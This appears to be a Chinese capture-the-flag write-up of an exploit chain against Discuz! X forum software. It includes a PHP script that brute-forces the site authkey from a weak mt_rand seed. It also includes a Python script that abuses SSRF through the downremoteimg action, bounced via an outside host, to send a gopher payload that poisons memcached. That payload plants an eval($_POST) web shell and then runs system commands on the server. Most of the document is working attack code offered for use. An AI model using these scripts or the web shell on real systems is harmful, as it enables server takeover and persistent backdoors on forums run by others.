漏洞原理描述
https://zhuanlan.zhihu.com/p/51907363
想要利用这个漏洞得知道key的前缀,首先在注册的地方抓包
GET /member.php?mod=register HTTP/1.1
Host: 103.108.67.223:8822
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: t2xl_2132_saltkey=gdBDOHes; t2xl_2132_lastvisit=1695128831; t2xl_2132_home_readfeed=1695139099; t2xl_2132_sid=uKH55w; t2xl_2132_lastact=1695393413%09misc.php%09seccode; t2xl_2132_onlineusernum=4; t2xl_2132_sendmail=1; t2xl_2132_seccode=1.6245ef1d965178b2cf
Upgrade-Insecure-Requests: 1
得到这个三个参数
cookie_pre:t2xl
saltkey :gdBDOHes
seccode=1.6245ef1d965178b2cf
有这些就足够了 先用脚本生成php_mt_seed的参数
脚本下载地址
https://github.com/openwall/php_mt_seed
#./php_mt_seed.sh 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 55 55 0 61 28 28 0 61 59 59 0 61 47 47 0 61 >2.txt
#cat 2.txt | awk ‘{print $3}’|tr -s ‘\n’ >seeds.txt
然后用脚本爆破authkey
<?php
$seeds_file = file_get_contents('seeds.txt');
$seeds = explode("\n",$seeds_file);
//var_dump($seeds);
for($i=0;$i<count($seeds);$i++){
mt_srand(intval($seeds[$i]));
$auth_key = random(10);
$tmp = random(4);
if($tmp == 't2xl'){
echo "=====================================\n";
echo "seed:".intval($seeds[$i])."\n";
echo "key:".$auth_key."\n";
check($auth_key);
}
}
function check($key){
$saltkey = 'gdBDOHes';
for($i=0;$i<16777215;$i++){
if($i%1000000==0){
echo ".";
}
if(substr(md5('10'.md5(pad($i).$key.$saltkey)),8,18)=='6245ef1d965178b2cf'){
//90=ssid.$_G['uid'] ssid来自seccode 9 uid是0
echo "\nFound key:".pad($i).$key;
die();
}
}
echo "\n";
}
function pad($i){
$h = dechex($i);
$h = strlen($h)==6?$h:str_repeat('0',6-strlen($h)).$h;
return $h;
}
function random($length) {
$hash = '';
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
$max = strlen($chars) - 1;
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}
import requests
import base64
import sys
import time
memory_prefix = 'Pyk94mAlBUt2xlWzj0Ps3tPuwkQLyNAQbvyQw5qQn69DKxNL11Vh'.split('t2xl')[1][:6]
payload = f"gopher://localhost:11211/_set%20{memory_prefix}_setting%201%200%20222%0Aa%3A2%3A%7Bs%3A6%3A%22output%22%3Ba%3A1%3A%7Bs%3A4%3A%22preg%22%3Ba%3A2%3A%7Bs%3A6%3A%22search%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A5%3A%22%2F.*%2Fe%22%3B%7Ds%3A7%3A%22replace%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A68%3A%22file_put_contents('.%2Fdata%2Fcache%2Fs1s.php'%2C'%3C%3Fphp%20eval(%24_POST%5Bi%5D)%3B%3F%3E')%22%3B%7D%7D%7Ds%3A13%3A%22rewritestatus%22%3Bi%3A1%3B%7D"
gopher = base64.b64encode(payload.encode()).decode()
attack_url = f'http://23.95.215.34/index.php?url={gopher}'
cookies = {
"home_lang":"cn",
"admin_lang":"cn",
"t2xl_2132_saltkey":"TqPuF2ai",
"t2xl_2132_lastvisit":"1695123382",
"t2xl_2132_seccode":"2.2c72b0f6f9fd3e206c",
"t2xl_2132_sid":"OwGkfW",
"t2xl_2132_lastact":"1695318878%09forum.php%09ajax"
}
url = f'http://103.108.67.223:8822/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]{attack_url}.jpg[/img]&inajax=1&fid=2&wysiwyg=1&formhash=362a2904&posttime=1476777238&wysiwyg=1&subject=test&unused%5B%5D=1'
re1 = requests.get(url,cookies=cookies)
re2 = requests.get("http://103.108.67.223:8822/forum.php?mod=ajax&action=getthreadtypes&inajax=yes")
re3 = requests.post('http://103.108.67.223:8822/data/cache/s1s.php',data={'i':'system("cat /flag");'})
if(re3.status_code!=404):
print(re3.text)